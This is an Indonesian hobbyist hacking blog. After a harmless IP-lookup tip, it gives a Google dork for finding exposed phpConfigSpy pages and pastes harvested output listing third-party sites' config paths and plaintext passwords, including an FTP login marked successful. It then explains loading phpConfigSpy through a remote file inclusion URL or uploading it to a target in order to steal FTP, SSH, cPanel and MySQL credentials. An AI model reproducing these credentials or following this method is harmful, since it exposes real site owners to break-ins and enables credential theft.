Mengetahui alamat IP dari sebuah Url

Untuk mengetahui IP ataupun alamat target dapat di cek dengan Mirc, caranya :
yang pertama ya harus  jalankan dulu mirc, maksudnya di buka program mircnya.
kedua, lihat pada statusnya atau jendela status mirc.
selanjutnya ketik pada statusnya:
/dns Web/IP

contohnya :
saat memasukkan perintah :
/dns google.com
maka akan keluar tampilan pada status mirc.
* Dns resolving google.com
-
* Dns resolved google.com to 64.233.167.99

dan kalau ingin tau lagi ketik /dns 64.233.167.99 maka akan mendapatkan
* Dns resolved 64.233.167.99 to py-in-f99.google.com

Itu artinya dapat meresolve ip dari google.com dan itu adalah ip dari google. Untuk mencek lagi alamat IP dapat juga di gunakan cmd atau command pada windows, dengan cara :
Start => run => ketik “cmd”
atau
Start => Programs => Accesaories => Command Prompt

setelah masuk jendela command tinggal ketik :
ping alamaturl

contoh :
ping shinchi-cakep.com

hasilnya :
C:\>ping shinchi-cakep.com

Pinging shinchi-cakep.com [209.62.20.175] with 32 bytes of data:

Reply from 209.62.20.175: bytes=32 time=355ms TTL=46
Reply from 209.62.20.175: bytes=32 time=318ms TTL=46
Reply from 209.62.20.175: bytes=32 time=370ms TTL=46
Reply from 209.62.20.175: bytes=32 time=305ms TTL=46

Ping statistics for 209.62.20.175:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 305ms, Maximum = 370ms, Average = 337ms

kalau pada linux tinggal mengetikan perintah terminal atau shell :
/sbin/ifconfig | grep inet

jadi deh
Belajar lagi ach… mayan banyak dapat infomasi dari kk di Irc

Mencari phpConfigSpy dengan mesin pencari

Dengan Bantuan search engini, kita di mudahkan dalam bekerja, mencari data ataupun mencari hal-hal yang mungkin pribadi, seperti contohnya saja adalah username dan password.

Di sengaja ataupun tidak di sengaja, bot google telah mendapatkannya. Dengan dork atau kata kunci untuk pencarian di google dapat dengan mudah kita temukan “phpConfigSpy” yang di simpan orang-orang “nakal” untuk mengetahui atau untuk mempermudah pencarian username dan password untuk login ssh,cpanel ataupun mysql.

Dengan Menuliskan “phpConfigSpy” kita akan mendapatkan file tersebut, seperti yang telah di dapatkan di bawah ini, dan juga dengan memasukkan dork :
intitle:phpConfigSpy
kita bisa mendapatkan username serta password.

Di bawah ini adalah data-data yang telah saya dapatkan dengan menggunakan Google.com

source phpconfigspy
http://www.ponpes.com/phpconfig.txt

http://pwp-northside.org/tool.php
[+] /home/darrell/public_html/gallery/include/config.inc.php
‘millencolin69

http://stocks50sixpac.com/calendar/events/index.php

[+] Founded 52 entrys in /etc/passwd
[+] Founded 52 readable public_html directories
[~] Searching for passwords in config files…

[+] /home/stocks50/public_html/menu/config.inc.php
johns07
[+] /home/carmens/public_html/config.inc.php
tirechange07
[+] /home/sassys/public_html/menu/config.inc.php
plane07ss
[+] /home/littlea/public_html/menu/config.inc.php
tt07la
[+] /home/otp/public_html/menu/config.inc.php
sfranklin07
[+] /home/yp/public_html/menu/config.inc.php
sandy07yp
[+] /home/limited/public_html/mailing-manager/index.php
password
[+] /home/jpl/public_html/guestbook/index.php
PassMess1
[+] /home/jpl/public_html/guestbook/admin/config.inc.php
7QYM50KpT7
[+] /home/tncs/public_html/menu/config.inc.php
ct07tnc
[+] /home/corners/public_html/menu/config.inc.php
daveh07
[+] /home/corners/public_html/mailing-manager/index.php
password
[+] /home/orchard/public_html/menu/config.inc.php
daved071
[+] /home/bistro/public_html/menu/config.inc.php
tom2007
[+] /home/bistro/public_html/config.inc.php
tom2007
[+] /home/ohio/public_html/menu/config.inc.php
osl07
[+] /home/anthonys/public_html/menu/config.inc.php
rizzo07af
[+] /home/morris/public_html/menu/config.inc.php
morris07kk
[+] /home/francosj/public_html/menu/config.inc.php
frankos07ps
[+] /home/phoenix/public_html/menu/config.inc.php
dspt07

[+] Done

http://dolhost.us/pbliga/info.php
dolhost.us to 208.68.174.90

[+] Founded 90 entrys in /etc/passwd
[+] Founded 90 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/pbligac/public_html/wales/album/config/config.php
Absolute path to directory where password file and album index are located (no trailing slash
[+] /home/pbligac/public_html/gazeta/datas/config.php
ufptnf
[+] /home/pbligac/public_html/pa/config.inc.php
The ‘cookie
[+] /home/croatia/public_html/includes/data/config.php
gAS48srI
[+] /home/croatia/public_html/includes/db.php
ew sql_db($dbhost, $dbuname, $dbpass, $dbname, f
[+] /home/estonia/public_html/votingpoll/config.php
jy4bqm
[+] /home/georgia/public_html/photo/config/config.php
DAlbum password control security of folders onl
[+] /home/minskcup/public_html/abelevich/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/abelevich/test/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/gif/abelevich/connect.php
ysql_connect (”localhost”, “minskcup_toto”, “password
[+] /home/minskcup/public_html/photo/config/config.php
Absolute path to directory where password file and album index are located (no trailing slash
[+] /home/rabotnic/public_html/config/config.php
cb4XNV78
[+] /home/slovenia/public_html/config.php
bpass: SQL Passwo
[+] /home/slovenia/public_html/db/db.php
ew sql_db($dbhost, $dbuname, $dbpass, $dbname, f
[+] /home/rustemga/public_html/admin/config.php
ustem06
[+] /home/clubonly/public_html/admin/config.php
luboy
[+] /home/moectrid/public_html/design0/admin/config.php
dmin
[+] /home/moectrid/public_html/admin/config.php
dmin
[+] /home/lyudmila/public_html/admin/config.php
leg
[+] /home/edbergma/public_html/config/config.inc.php
‘T3b5qPxt
[+] /home/edbergma/public_html/pres/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/edbergma/public_html/pdf/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/r2650066/public_html/include/config.php
U6Lsj196h3
[+] /home/r2650066/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/lindenfl/public_html/include/config.php
GnHR8FdT
[+] /home/lindenfl/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/dolinvoi/public_html/include/config.php
Y47Lhp6B
[FTP] dolinvoi:Y47LhXXX Success
[+] /home/dolinvoi/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/voyager7/public_html/include/config.php
R7wwFfer
[+] /home/voyager7/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/bigapple/public_html/include/config.php
4xEJ9TaV
[+] /home/bigapple/public_html/include/classes/db.php
nction connect($dbhost, $dbusername, $dbpassword, $dbname
[+] /home/glavsco/public_html/admin/include/config.inc.php
nj6Gts;L87t
[+] /home/glavsco/public_html/include/config.inc.php
nj6Gts;L87t

[+] Done

Saya sebenarnya binggung nama username dan mana password.
Kalaupun ada yang baca ini, mohon tambahan ataupun koreksi .

Saya cuma chatter, yang ingin tahu banyak hal

Menggunakan phpConfigSpy v0.2 pada target RFI

Menggunakan phpConfigSpy v0.2 pada target RFI

phpConfigSpy v0.2 Merupakan sebuah code php yang di gunakan untuk melihat file :

config.php
config.inc.php
conf.php
settings.php
setup.php
dbconf.php
dbconfig.php
db.inc.php
dbconnect.php
connect.php
index.php
common.php
config_global.php
db.php
connect.inc.php
dbconnect.inc.php

Dan untuk membaca isi file-file tersebut, untuk mendapatkan username dan password untuk login. Baik untuk Login ftp, ssh, Cpanel dan mysql.

Apabila phpConfigSpy mendapatkan sebuah file di atas atau lebih akan menghasilkan :

[+] Founded 53 entrys in /etc/passwd
[+] Founded 53 readable public_html directories
[~] Searching for passwords in config files…

[+] /home/chokbd/public_html/phpsql/config.inc.php
mysql/user
seperti pada gambar di bawah ini :

Ada 2 cara untuk menggunakan phpConfigSpy yaitu :

1. Injectkan Langsung.
Dimana inject-kan langsung ini seperti melakukan inject-kan biasa seperti halnya meload botphp ataupun Pbot.

www.target-di.biz/aframe.php?page=http:/inject-an-di.biz/php/phpspy.txt??

Target Vuln/Bug Inject-kan

2. Upload phpConfigSpy di target.
Langsung saja upload file phpConfigSpy di target. asalkan filenya ber-ekstensi .php langsung dapat di gunakan dengan langsung membuka file yang di upload tadi.
Tinggal membuka di browser ww.target-di.biz/files/spy.php
bila sudah di buka tinggal tunggu prosesnya saja, dan lihat hasilnya.

Bila phpConfigSpy masih ber-ekstense .txt di ubah menjadi .php. dan di buka dengan browser seperti cara di atas. file yang bernama spy.php adalah file phpConfigSpy.

untuk source code nya dapat di lihat di :
Source Code phpConfigSpy v0.2

Makasih Banget untuk kk :
noname untuk source code dan penjelasannya ^_^
DonaTTeLo untuk target dan injekannya

By : Shinchi di www.samada.wordpress.com dengan Nama file asli :
Menggunakan phpConfigSpy v0.2

Blog pertama Dengan nama Shinchi Loh

Horeee.. Akhirnya jadi juga blog Shinchi ini heheheh….
Walaupun udah berkali-kali register tapi gk di terika ama om wordpress.. tapi sekarang nggak tau juga kenapa dan bisa dehhh hehehe..

bahagiana saia, akhirnya punya blog dengan nick saia sendiri wahahahah senangnyaa…..

Dan buat yang udah mampir disini Salam Kenal yach heheh Dari Shinchi Muach…..